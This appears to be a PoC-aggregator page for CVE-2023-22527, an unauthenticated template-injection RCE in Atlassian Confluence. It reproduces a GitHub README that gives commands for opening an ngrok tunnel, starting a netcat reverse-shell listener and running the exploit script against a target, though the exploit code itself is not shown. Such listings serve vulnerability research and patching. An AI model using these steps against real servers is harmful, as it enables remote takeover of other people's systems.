CVE-2023-22527 PoC — Atlassian Confluence 安全漏洞

Source

https://github.com/VNCERT-CC/CVE-2023-22527-confluence

Associated Vulnerability

Title:Atlassian Confluence 安全漏洞 (CVE-2023-22527)
Description:A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action. Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.

Description

[Confluence] CVE-2023-22527 realworld poc

Readme

# CVE-2023-22527-confluence
[Confluence] CVE-2023-22527 realworld poc

# Usage
## Download bun
https://github.com/oven-sh/bun/releases

## Start ngrok
```
ngrok tcp 4444
```

## Listen localhost 4444
```
nc -nvlp 4444
```

## Run exploit
```
bun exploit-CVE-2023-22527.js --lhost 0.tcp.ap.ngrok.io --lport 12169 --target https://xxx/
```

## Result
![image](https://github.com/VNCERT-CC/CVE-2023-22527-confluence/assets/8877695/716a9df2-3154-4672-9410-86ba87971798)
![image](https://github.com/VNCERT-CC/CVE-2023-22527-confluence/assets/8877695/1a2d7711-24dc-4837-8e49-21687ea4f6be)

File Snapshot


 [4.0K]  /data/pocs/4fd9659479f59a70dbcd2b1d3cbd7e03dfd04075
├── [3.6K]  exploit-CVE-2023-22527.js
└── [ 583]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!